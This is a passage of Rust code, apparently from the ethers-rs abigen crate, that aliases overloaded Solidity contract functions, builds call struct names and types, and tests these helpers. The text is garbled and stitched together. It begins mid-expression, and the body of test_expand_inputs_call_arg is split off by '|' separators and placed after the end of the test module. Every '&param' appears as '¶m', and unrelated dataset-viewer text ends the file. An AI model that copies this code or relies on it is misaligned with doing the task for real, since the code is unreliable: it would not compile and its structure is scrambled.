.filter(|f| !aliases.contains_key(&f.abi_signature()))
.count()
<= 1
{
// no conflicts
continue;
}
// sort functions by number of inputs asc
let mut functions = functions.iter().collect::<Vec<_>>();
functions.sort_by(|f1, f2| f1.inputs.len().cmp(&f2.inputs.len()));
let prev = functions[0];
for duplicate in functions.into_iter().skip(1) {
// attempt to find diff in the input arguments
let diff = duplicate
.inputs
.iter()
.filter(|i1| prev.inputs.iter().all(|i2| *i1 != i2))
.collect::<Vec<_>>();
let alias = match diff.len() {
0 => {
// this should not happen since functions with same name and input are
// illegal
anyhow::bail!(
"Function with same name and parameter types defined twice: {}",
duplicate.name
);
}
1 => {
// single additional input params
format!(
"{}_with_{}",
duplicate.name.to_snake_case(),
diff[0].name.to_snake_case()
)
}
_ => {
// 1 + n additional input params
let and = diff
.iter()
.skip(1)
.map(|i| i.name.to_snake_case())
.collect::<Vec<_>>()
.join("_and_");
format!(
"{}_with_{}_and_{}",
duplicate.name.to_snake_case(),
diff[0].name.to_snake_case(),
and
)
}
};
aliases.insert(duplicate.abi_signature(), util::safe_ident(&alias));
}
}
Ok(aliases)
}
}
fn expand_fn_outputs(outputs: &[Param]) -> Result<TokenStream> {
match outputs.len() {
0 => Ok(quote! { () }),
1 => types::expand(&outputs[0].kind),
_ => {
let types = outputs
.iter()
.map(|param| types::expand(¶m.kind))
.collect::<Result<Vec<_>>>()?;
Ok(quote! { (#( #types ),*) })
}
}
}
fn expand_selector(selector: Selector) -> TokenStream {
let bytes = selector.iter().copied().map(Literal::u8_unsuffixed);
quote! { [#( #bytes ),*] }
}
/// Expands to the name of the call struct
fn expand_call_struct_name(function: &Function, alias: Option<&Ident>) -> Ident {
let name = if let Some(id) = alias {
format!("{}Call", id.to_string().to_pascal_case())
} else {
format!("{}Call", function.name.to_pascal_case())
};
util::ident(&name)
}
/// Expands to the name of the call struct
fn expand_call_struct_variant_name(function: &Function, alias: Option<&Ident>) -> Ident {
let name = if let Some(id) = alias {
id.to_string().to_pascal_case()
} else {
function.name.to_pascal_case()
};
util::ident(&name)
}
/// Expands to the tuple struct definition
fn expand_data_tuple(name: &Ident, params: &[(TokenStream, TokenStream)]) -> TokenStream {
let fields = params
.iter()
.map(|(_, ty)| {
quote! {
pub #ty }
})
.collect::<Vec<_>>();
if fields.is_empty() {
quote! { struct #name; }
} else {
quote! { struct #name( #( #fields ),* ); }
}
}
/// Expands to the struct definition of a call struct
fn expand_data_struct(name: &Ident, params: &[(TokenStream, TokenStream)]) -> TokenStream {
let fields = params
.iter()
.map(|(name, ty)| {
quote! { pub #name: #ty }
})
.collect::<Vec<_>>();
quote! { struct #name { #( #fields, )* } }
}
#[cfg(test)]
mod tests {
use ethers_core::abi::ParamType;
use super::*;
// packs the argument in a tuple to be used for the contract call
fn expand_inputs_call_arg(inputs: &[Param]) -> TokenStream {
let names = inputs
.iter()
.enumerate()
.map(|(i, param)| {
let name = util::expand_input_name(i, ¶m.name);
match param.kind {
// this is awkward edge case where the function inputs are a single struct
// we need to force this argument into a tuple so it gets expanded to
// `((#name,))` this is currently necessary because
// internally `flatten_tokens` is called which removes the outermost `tuple`
// level and since `((#name))` is not a rust tuple it
// doesn't get wrapped into another tuple that will be peeled off by
// `flatten_tokens`
ParamType::Tuple(_) if inputs.len() == 1 => {
// make sure the tuple gets converted to `Token::Tuple`
quote! {(#name,)}
}
_ => name,
}
})
.collect::<Vec<TokenStream>>();
match names.len() {
0 => quote! { () },
1 => quote! { #( #names )* },
_ => quote! { ( #(#names, )* ) },
}
}
// converts the function params to name/type pairs
fn expand_inputs(inputs: &[Param]) -> Result<TokenStream> {
let params = inputs
.iter()
.enumerate()
.map(|(i, param)| {
let name = util::expand_input_name(i, ¶m.name);
let kind = types::expand(¶m.kind)?;
Ok(quote! { #name: #kind })
})
.collect::<Result<Vec<_>>>()?;
Ok(quote! { #( , #params )* })
}
#[test]
fn test_expand_inputs_call_arg() |
#[test]
fn expand_inputs_empty() {
assert_quote!(expand_inputs(&[]).unwrap().to_string(), {},);
}
#[test]
fn expand_inputs_() {
assert_quote!(
expand_inputs(
&[
Param {
name: "a".to_string(),
kind: ParamType::Bool,
internal_type: None,
},
Param {
name: "b".to_string(),
kind: ParamType::Address,
internal_type: None,
},
],
)
.unwrap(),
{ , a: bool, b: ethers_core::types::Address },
);
}
#[test]
fn expand_fn_outputs_empty() {
assert_quote!(expand_fn_outputs(&[],).unwrap(), { () });
}
#[test]
fn expand_fn_outputs_single() {
assert_quote!(
expand_fn_outputs(&[Param {
name: "a".to_string(),
kind: ParamType::Bool,
internal_type: None,
}])
.unwrap(),
{ bool },
);
}
#[test]
fn expand_fn_outputs_multiple() {
assert_quote!(
expand_fn_outputs(&[
Param {
name: "a".to_string(),
kind: ParamType::Bool,
internal_type: None,
},
Param {
name: "b".to_string(),
kind: ParamType::Address,
internal_type: None,
},
],)
.unwrap(),
{ (bool, ethers_core::types::Address) },
);
}
}
| {
// no inputs
let params = vec![];
let token_stream = expand_inputs_call_arg(¶ms);
assert_eq!(token_stream.to_string(), "()");
// single input
let params = vec![Param {
name: "arg_a".to_string(),
kind: ParamType::Address,
internal_type: None,
}];
let token_stream = expand_inputs_call_arg(¶ms);
assert_eq!(token_stream.to_string(), "arg_a");
// two inputs
let params = vec![
Param {
name: "arg_a".to_string(),
kind: ParamType::Address,
internal_type: None,
},
Param {
name: "arg_b".to_string(),
kind: ParamType::Uint(256usize),
internal_type: None,
},
];
let token_stream = expand_inputs_call_arg(¶ms);
assert_eq!(token_stream.to_string(), "(arg_a , arg_b ,)");
// three inputs
let params = vec![
Param {
name: "arg_a".to_string(),
kind: ParamType::Address,
internal_type: None,
},
Param {
name: "arg_b".to_string(),
kind: ParamType::Uint(128usize),
internal_type: None,
},
Param {
name: "arg_c".to_string(),
kind: ParamType::Bool,
internal_type: None,
},
];
let token_stream = expand_inputs_call_arg(¶ms);
assert_eq!(token_stream.to_string(), "(arg_a , arg_b , arg_c ,)");
} |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.